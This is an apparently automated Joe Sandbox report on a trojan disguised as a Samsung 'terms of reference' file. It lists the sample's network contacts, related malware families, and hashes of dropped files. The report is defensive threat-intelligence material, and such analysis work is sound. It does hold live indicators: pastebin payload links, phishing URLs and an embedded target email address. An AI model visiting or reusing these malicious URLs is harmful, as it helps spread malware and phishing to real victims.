208.95.112.1     ip-api.com        United States       53334  TUT-ASUS         false
149.154.167.220  api.telegram.org  United Kingdom      62041  TELEGRAMRU       false
172.67.19.24     pastebin.com      United States       13335  CLOUDFLARENETUS  false
89.23.97.214     unknown           Russian Federation  48687  MAXITEL-ASRU     false
172.67.74.152    api.ipify.org     United States       13335  CLOUDFLARENETUS  false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1617329
Start date and time: 2025-02-17 18:56:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Terms_of_reference_06_01_2025_samsung.scr.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@14/17@5/5
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197, 20.242.39.171
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 4084 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
Time | Type | Description
12:57:11 | API Interceptor | 57x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Contract for Partners.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | JV4lf0wkWV.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | BAMParser.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | Fatality-unpadded.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 1111.exe | malicious | Unknown | www.ip-api.com/line/?fields=16401
208.95.112.1 | 1111.exe | malicious | Unknown | www.ip-api.com/line/?fields=16401
208.95.112.1 | Xworm-V5.6.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | KNT3NUxTeD.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Nueva Orden de Compra.exe | malicious | Quasar | ip-api.com/json/
208.95.112.1 | Bind.exe | malicious | Unknown | ip-api.com/json
149.154.167.220 | JV4lf0wkWV.exe | malicious | Unknown |
149.154.167.220 | Nonmerchantable.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | JUSTIFICANTE DE TRANSFERENCIA.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | copia_01929pdf.exe | malicious | AgentTesla |
149.154.167.220 | JUSTIF. PAGO AQUISGRANpdf.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | INQUIRYS#87636_5_PACKAGING_VIET_NAM.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Hermaean.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | facturar.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | Justificante de pago.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | siparis po1_ BYZ01072410 - Turkiye CRSP0177462 fiyat teklifi 01024.exe | malicious | Snake Keylogger, VIP Keylogger |
172.67.19.24 | rrats.exe | malicious | AsyncRAT | pastebin.com/raw/KKpnJShN
172.67.19.24 | sys_upd.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm_menu..ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm2.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm_phshop..ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | pastebin.com/raw/sA04Mwk2
172.67.19.24 | HQsitBLlOv.dll | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | xK44OOt7vD.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | steamcodegenerator.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | pastebin.com/raw/sA04Mwk2
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pastebin.com | Contract for Partners.exe | malicious | Unknown | 172.67.19.24
pastebin.com | JV4lf0wkWV.exe | malicious | Unknown | 104.20.3.235
pastebin.com | XClient.exe | malicious | XWorm | 104.20.4.235
pastebin.com | Setup.exe | malicious | LummaC Stealer | 104.20.3.235
pastebin.com | FD7F#U007e1.EXE.exe | malicious | LummaC Stealer | 172.67.19.24
pastebin.com | FD7F#U007e1.EXE.exe | malicious | LummaC Stealer | 104.20.4.235
pastebin.com | Paketfoto_pdf.vbs | malicious | XWorm | 172.67.19.24
pastebin.com | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | malicious | LummaC Stealer | 104.20.4.235
pastebin.com | #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe | malicious | LummaC Stealer | 172.67.19.24
pastebin.com | #Ud835#Uddb2#Ud835#Udda4#Ud835#Uddb3#Ud835#Uddb4#Ud835#Uddaf.exe | malicious | LummaC Stealer | 104.20.4.235
ip-api.com | Contract for Partners.exe | malicious | Unknown | 208.95.112.1
ip-api.com | JV4lf0wkWV.exe | malicious | Unknown | 208.95.112.1
ip-api.com | BAMParser.exe | malicious | XWorm | 208.95.112.1
ip-api.com | Fatality-unpadded.exe | malicious | XWorm | 208.95.112.1
ip-api.com | 1111.exe | malicious | Unknown | 208.95.112.1
ip-api.com | 1111.exe | malicious | Unknown | 208.95.112.1
ip-api.com | Xworm-V5.6.exe | malicious | XWorm | 208.95.112.1
ip-api.com | KNT3NUxTeD.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Nueva Orden de Compra.exe | malicious | Quasar | 208.95.112.1
ip-api.com | Bind.exe | malicious | Unknown | 208.95.112.1
api.telegram.org | JV4lf0wkWV.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | Nonmerchantable.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | JUSTIFICANTE DE TRANSFERENCIA.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | copia_01929pdf.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | JUSTIF. PAGO AQUISGRANpdf.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | INQUIRYS#87636_5_PACKAGING_VIET_NAM.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Hermaean.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | facturar.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Justificante de pago.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | siparis po1_ BYZ01072410 - Turkiye CRSP0177462 fiyat teklifi 01024.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.ipify.org | Contract for Partners.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | JV4lf0wkWV.exe | malicious | Unknown | 172.67.74.152
                                                                                                                                                                                      ZIOpctBE0o.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                      copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                      Doc 1189623388009.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                      play.wav.htmGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                      CheckList Job no.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                      http://nodeissuesfix.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                      https://business.secure-accounts-security.com/wp-content/.htaccessGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                      NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 104.26.12.205
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
MAXITEL-ASRU | JV4lf0wkWV.exe | Get hash | malicious | Unknown | Browse | 89.23.98.26
MAXITEL-ASRU | 8MFZ4GzHgb.exe | Get hash | malicious | RedLine | Browse | 89.23.101.77
MAXITEL-ASRU | SecuriteInfo.com.Trojan.MulDrop29.5208.14569.1678.exe | Get hash | malicious | PureCrypter, AsyncRAT | Browse | 89.23.102.248
MAXITEL-ASRU | SecuriteInfo.com.Trojan.MulDrop29.5208.14569.1678.exe | Get hash | malicious | PureCrypter, AsyncRAT | Browse | 89.23.102.248
MAXITEL-ASRU | lO5lV39HDj.exe | Get hash | malicious | DarkTortilla, Quasar | Browse | 89.23.99.249
MAXITEL-ASRU | Fixer.exe | Get hash | malicious | RedLine | Browse | 89.23.101.77
MAXITEL-ASRU | cyOFt8NElN.exe | Get hash | malicious | RHADAMANTHYS | Browse | 89.23.97.211
MAXITEL-ASRU | nATCTqtxP7.exe | Get hash | malicious | Orcus | Browse | 89.23.102.157
MAXITEL-ASRU | Ts3uGfdkae.lnk | Get hash | malicious | Unknown | Browse | 89.23.107.219
MAXITEL-ASRU | hz7DzW2Yop.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 89.23.100.242
TELEGRAMRU | JV4lf0wkWV.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
TELEGRAMRU | Nonmerchantable.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | updater.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99
TELEGRAMRU | JUSTIFICANTE DE TRANSFERENCIA.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | copia_01929pdf.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
TELEGRAMRU | JUSTIF. PAGO AQUISGRANpdf.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | INQUIRYS#87636_5_PACKAGING_VIET_NAM.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | Hermaean.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
TELEGRAMRU | facturar.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | Justificante de pago.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
CLOUDFLARENETUS | Contract for Partners.exe | Get hash | malicious | Unknown | Browse | 172.67.74.152
CLOUDFLARENETUS | JV4lf0wkWV.exe | Get hash | malicious | Unknown | Browse | 172.67.74.152
CLOUDFLARENETUS | https://www.buildwithbrick.com/ | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | ZIOpctBE0o.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 172.67.74.152
CLOUDFLARENETUS | https://rpqffvhbb.cc.rs6.net/tn.jsp?f=0014kcclQXjPXojT0ti9V52RcXl4z4Vz--beWhEpNrqnLWHxys4qF9LPuo_spJkGtd99wCHXIF8SrjNw5f7C7a4uHYln_cY2bKtw_9grTGpKhyUdMN54rd5jGq9iXvjTQ_1ZqPOlcyaJO5i6eVirYCS-Aw8Yj3ZjuVLOe5I_meMvRPB2ZFMGWUJnIhs01nCTgS6IU1DHYOHg0cPeTM9oCls9zcwREma1URiZR_mcbieP3coMGuF7tAZZKkqIGQi3B0QOls2fxlpqFxzOMHmfXgLkQ==&c=m9vJ9fSAy80r925LymjLMH-zd09aiPFcNFYgM-NaI83_5TV5j31yRA==&ch=metbn8RrmYKdxQqAH_UNs4zoTXwjYFbMJ4QbLNi8NvHcFYJaLDgOEA== | Get hash | malicious | HTMLPhisher | Browse | 188.114.97.3
CLOUDFLARENETUS | https://adfs-OZrtY7DQglHoAZotD0jKGmDz9af367vOzfOaftUDQT6I4YZH3E.lumpnk.ru/vXsP8/###9jbuxkemper@louisianaspine.org | Get hash | malicious | Unknown | Browse | 104.16.2.189
CLOUDFLARENETUS | https://www.buildwithbrick.com/ | Get hash | malicious | Anonymous Proxy | Browse | 104.17.25.14
CLOUDFLARENETUS | https://na4.docusign.net/Signing/EmailStart.aspx?a=3c56b97e-f52b-41fb-a108-03e6f0b98497&etti=24&acct=64ac2e03-602c-40bb-a404-aa2fbcd4cb57&er=c83d01c5-2226-4002-b236-f161c9bed457 | Get hash | malicious | HTMLPhisher | Browse | 104.18.87.42
CLOUDFLARENETUS | mMS2hfsyJd.img | Get hash | malicious | MassLogger RAT | Browse | 104.21.16.1
CLOUDFLARENETUS | 2025 Q1 Staff Pay Adjustment-Handbook.pdf | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
TUT-ASUS | Contract for Partners.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
TUT-ASUS | JV4lf0wkWV.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
TUT-ASUS | BAMParser.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
TUT-ASUS | Fatality-unpadded.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
TUT-ASUS | 1111.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
TUT-ASUS | 1111.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
TUT-ASUS | Xworm-V5.6.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
TUT-ASUS | KNT3NUxTeD.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | Nueva Orden de Compra.exe | Get hash | malicious | Quasar | Browse | 208.95.112.1
TUT-ASUS | Bind.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | Contract for Partners.exe | Get hash | malicious | Unknown | Browse | 172.67.19.24, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | JV4lf0wkWV.exe | Get hash | malicious | Unknown | Browse | 172.67.19.24, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://www.buildwithbrick.com/ | Get hash | malicious | Unknown | Browse | 172.67.19.24, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | BN.exe | Get hash | malicious | Quasar | Browse | 172.67.19.24, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | sHsYUp3BAs.exe | Get hash | malicious | DragonForce | Browse | 172.67.19.24, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | cool.exe | Get hash | malicious | Discord Rat | Browse | 172.67.19.24, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | cool.exe | Get hash | malicious | Discord Rat | Browse | 172.67.19.24, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Bi7E8ewP40.exe | Get hash | malicious | Discord Rat | Browse | 172.67.19.24, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | bIJyZ1RcHG.exe | Get hash | malicious | Discord Rat | Browse | 172.67.19.24, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Bi7E8ewP40.exe | Get hash | malicious | Discord Rat | Browse | 172.67.19.24, 149.154.167.220
                                                                                                                                                                                      No context
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Reputation:high, very likely benign file
Preview:@...e...........................................................

Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Feb 17 19:48:26 2025, 1st section name ".debug$S"
Category:dropped
Size (bytes):1336
Entropy (8bit):3.988567256280001
Encrypted:false
SSDEEP:24:H2m9p4HybZHJwKqxmNWI+ycuZhNvakSRPNnqSSd:psASKqxm41ulva3jqSC
MD5:8128575292E1106BC77BB4AE1ABD205E
SHA1:8C354CF07335355E24A020F75DF58E0FFCE7F36E
SHA-256:8E883DF5DC15A14EECD200C9096B73196B621BA839C626240C9C36D854D917D8
SHA-512:6296C4D4EF18375AA249481FED056BDBE417916D4352348C4A62C7CCF76335291F00A92826F7D791E1A7039A58711FCD2FB0A6FB7B0D99D27977512D7A92C9F5
Malicious:false
Preview:L......g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP....................Lsu.Y^.......X..........4.......C:\Users\user\AppData\Local\Temp\RES792.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.y.2.h.0.p.k.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                      Entropy (8bit):3.112567625336604
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry++Fak7Ynqq1+qPN5Dlq5J:+RI+ycuZhNvakSRPNnqX
                                                                                                                                                                                      MD5:E8004C7375D9595EC00FAAA293DDF958
                                                                                                                                                                                      SHA1:EE042DF2F38E1C5DAE077CE50D8E39E0EC42C743
                                                                                                                                                                                      SHA-256:D8E7EB86E76F1CA55A15CE91F50BEFFE106957170DA4AB9E435F33FD5FEC43AC
                                                                                                                                                                                      SHA-512:B0B542F76D9104EE7898D99F0E757B08FD25BD595A2C4E5D738C1444FC7CE14701CEA0692E1ED1C148FD68DEBA74006B41DF88DC495C3C82E71C6942AA4800A3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.y.2.h.0.p.k.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.y.2.h.0.p.k.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2251
                                                                                                                                                                                      Entropy (8bit):5.037863634769049
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:JoOuOAXQbx7TBdBLMUgs94+gl+IC+YrI5IFfRW8:JoOgacG3U1cU8
                                                                                                                                                                                      MD5:2C374853E019C145F1168AD3528E727A
                                                                                                                                                                                      SHA1:7D0F43BF5FFBA8C166D450FF3096C77EB51B118E
                                                                                                                                                                                      SHA-256:87CF3574FF2F8C971698099C7AEBEA76E7DF657E063B384A07BD31DE28A5BDAF
                                                                                                                                                                                      SHA-512:4AEC3D17CB3D22212ED1E87C01144729FD49EA65963C75CF18876516140303956D3933D1044F13F33D2A551E5F7B61A084350A1A1E727FBA56F81763EFFC1DAE
                                                                                                                                                                                      Malicious:false
